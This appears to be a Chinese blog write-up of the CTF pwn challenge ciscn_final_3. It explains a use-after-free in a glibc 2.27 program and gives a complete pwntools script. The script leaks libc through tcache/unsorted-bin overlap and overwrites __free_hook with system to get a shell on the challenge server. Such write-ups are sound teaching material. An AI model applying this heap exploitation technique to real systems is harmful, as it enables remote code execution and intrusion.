ha1vk's blog
0%

ciscn_final_3

发表于 分类于

程序给的glibc版本为2.27,存在tcache机制

首先检查一下程序的保护机制

然后,我们用IDA分析一下

Delete功能存在UAF漏洞

程序没有show的功能,但是add时,会显示堆的地址。

为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,把堆申请到main_arena处,打印堆地址时,返回的就是main_arena的地址。由于glibc版本为2.27,因此很容易利用,要得到unsorted bin范围的chunk,我们只需要篡改chunk的头部,然后多次free。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#coding:utf8
from pwn import *

#sh = process('./ciscn_final_3')
sh = remote('node3.buuoj.cn',29193)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
free_hook_s = libc.symbols['__free_hook']
malloc_hook_s = libc.symbols['__malloc_hook']
system_s = libc.sym['system']

def add(index,size,content):
   sh.sendlineafter('choice >','1')
   sh.sendlineafter('input the index',str(index))
   sh.sendlineafter('input the size',str(size))
   sh.sendafter('now you can write something',content)
   sh.recvuntil('gift :')
   heap_addr = int(sh.recvuntil('\n',drop = True),16)
   return heap_addr

def delete(index):
   sh.sendlineafter('choice >','2')
   sh.sendlineafter('input the index',str(index))

#0
add(0,0x70,'a'*0x70) - 0x10
#1
heap_addr = add(1,0x70,'b'*0x70) - 0x10
for i in range(2,10):
   add(i,0x70,'c'*0x70)

#10
add(10,0x10,'e'*0x10)
print 'heap_addr=',hex(heap_addr)
#double free
#多弄几个,使得size最后不会变成负数
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)

#修改tcache的next指针,同时,设置chunk1的prev_size域为chunk1本身的地址,这样,我们申请到chunk1的头部时,next指针就对应了prev_size域
#由此继续形成了循环链表
add(11,0x78,p64(heap_addr) + 'a'*0x68 + p64(heap_addr + 0x10))
add(12,0x70,'a'*0x70)

#修改chunk1的头信息,使得1~9的大小合并
add(13,0x70,p64(heap_addr) + p64(0x80*9 + 1))
#获得unsorted bin
delete(1)
add(14,0x70,'d')
#申请到main_arena里,从而获得libc地址
main_arena_xx = add(15,0x70,'e')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#double free
delete(0)
delete(0)
add(16,0x70,p64(free_hook_addr))
add(17,0x70,'/bin/sh\x00')
#写free_hook
add(18,0x70,p64(system_addr))
#getshell
delete(17)

sh.interactive()